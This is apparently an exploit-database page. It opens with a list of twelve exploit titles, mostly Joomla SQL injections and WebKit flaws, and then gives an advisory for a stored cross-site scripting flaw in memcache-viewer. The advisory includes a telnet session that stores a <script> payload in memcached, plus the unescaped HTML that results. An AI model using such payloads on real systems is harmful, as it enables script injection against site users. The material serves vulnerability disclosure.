438afbcaf8
12 new exploits Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Joomla! Component JooDatabase 3.1.0 - SQL Injection Joomla! Component JO Facebook Gallery 4.5 - SQL Injection Joomla! Component AJAX Search for K2 2.2 - SQL Injection Joomla! Component Community Surveys 4.3 - SQL Injection Joomla! Component Community Polls 4.5.0 - SQL Injection Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting Joomla! Component GPS Tools 4.0.1 - SQL Injection Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass Joomla! Component Community Quiz 4.3.5 - SQL Injection Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting memcache-viewer - Cross-Site Scripting
30 lines
1.1 KiB
Text
Executable file
30 lines
1.1 KiB
Text
Executable file
# Exploit Title: memcache-viewer - Stored XSS
|
|
# Date: 2017-02-24
|
|
# Exploit Author: HaHwul
|
|
# Exploit Author Blog: www.hahwul.com
|
|
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
|
|
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
|
|
# Version: Latest commit
|
|
# Tested on: Debian [wheezy]
|
|
|
|
### Vulnerability
|
|
This program does not filter filtering on the special character when expressing the data from memcached on the web.
|
|
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.
|
|
|
|
### Example Attack code
|
|
1. Send Payload(XSS Code) after Connecting to memcached server.
|
|
#> telnet 127.0.0.1 11211
|
|
Trying 127.0.0.1...
|
|
Connected to 127.0.0.1.
|
|
Escape character is '^]'.
|
|
|
|
add hacked<script>alert(45)</script> 0 900 2
|
|
45
|
|
STORED
|
|
|
|
2. Insert data through memcached related 3rd party application.
|
|
|
|
### Result
|
|
Access index.php after memcache-viewer login
|
|
DOM Area in index.php
|
|
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>
|